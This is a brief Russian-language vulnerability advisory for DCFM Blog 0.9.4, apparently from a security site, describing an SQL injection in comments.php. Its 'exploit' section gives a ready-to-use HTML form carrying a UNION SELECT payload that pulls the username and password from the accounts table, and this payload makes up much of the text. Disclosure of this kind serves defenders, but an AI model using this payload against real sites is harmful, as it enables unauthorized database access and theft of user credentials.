Программа: DCFM Blog 0.9.4

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием comments.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

<form action="http://localhost/dcfmblog/comments.php" method="post">
<input type="text" name="id" size=50 value="-99′ union select
0,username,password from accounts where id=1/*">
<input type="submit" value=" send ">
</form>



Оставить мнение